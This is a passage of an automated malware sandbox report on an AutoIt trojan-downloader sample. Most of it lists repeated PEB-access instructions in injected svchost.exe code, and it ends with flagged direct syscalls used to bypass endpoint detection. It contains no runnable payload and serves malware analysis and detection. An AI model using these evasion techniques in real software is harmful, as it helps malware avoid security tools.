            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h]1_2_038C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h]1_2_038EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038364AB mov eax, dword ptr fs:[00000030h]1_2_038364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h]1_2_038644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h]1_2_038BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h]1_2_038304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h]1_2_0382C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h]1_2_038EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382645D mov eax, dword ptr fs:[00000030h]1_2_0382645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385245A mov eax, dword ptr fs:[00000030h]1_2_0385245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h]1_2_038BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h]1_2_038DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h]1_2_0385EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h]1_2_038BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904B00 mov eax, dword ptr fs:[00000030h]1_2_03904B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB40 mov eax, dword ptr fs:[00000030h]1_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8B42 mov eax, dword ptr fs:[00000030h]1_2_038D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828B50 mov eax, dword ptr fs:[00000030h]1_2_03828B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEB50 mov eax, dword ptr fs:[00000030h]1_2_038DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382CB7E mov eax, dword ptr fs:[00000030h]1_2_0382CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904A80 mov eax, dword ptr fs:[00000030h]1_2_03904A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868A90 mov edx, dword ptr fs:[00000030h]1_2_03868A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886AA4 mov eax, dword ptr fs:[00000030h]1_2_03886AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830AD0 mov eax, dword ptr fs:[00000030h]1_2_03830AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCA11 mov eax, dword ptr fs:[00000030h]1_2_038BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA24 mov eax, dword ptr fs:[00000030h]1_2_0386CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EA2E mov eax, dword ptr fs:[00000030h]1_2_0385EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEA60 mov eax, dword ptr fs:[00000030h]1_2_038DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]1_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]1_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]1_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]1_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov esi, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C69C0 mov eax, dword ptr fs:[00000030h]1_2_038C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038649D0 mov eax, dword ptr fs:[00000030h]1_2_038649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA9D3 mov eax, dword ptr fs:[00000030h]1_2_038FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE9E0 mov eax, dword ptr fs:[00000030h]1_2_038BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]1_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]1_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]1_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]1_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC912 mov eax, dword ptr fs:[00000030h]1_2_038BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]1_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]1_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B892A mov eax, dword ptr fs:[00000030h]1_2_038B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C892B mov eax, dword ptr fs:[00000030h]1_2_038C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0946 mov eax, dword ptr fs:[00000030h]1_2_038B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904940 mov eax, dword ptr fs:[00000030h]1_2_03904940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov edx, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]1_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]1_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC97C mov eax, dword ptr fs:[00000030h]1_2_038BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830887 mov eax, dword ptr fs:[00000030h]1_2_03830887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC89D mov eax, dword ptr fs:[00000030h]1_2_038BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E8C0 mov eax, dword ptr fs:[00000030h]1_2_0385E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039008C0 mov eax, dword ptr fs:[00000030h]1_2_039008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA8E4 mov eax, dword ptr fs:[00000030h]1_2_038FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]1_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]1_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC810 mov eax, dword ptr fs:[00000030h]1_2_038BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov ecx, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008D81F7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008AA395
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008AA364 SetUnhandledExceptionFilter,0_2_008AA364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtOpenKeyEx: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
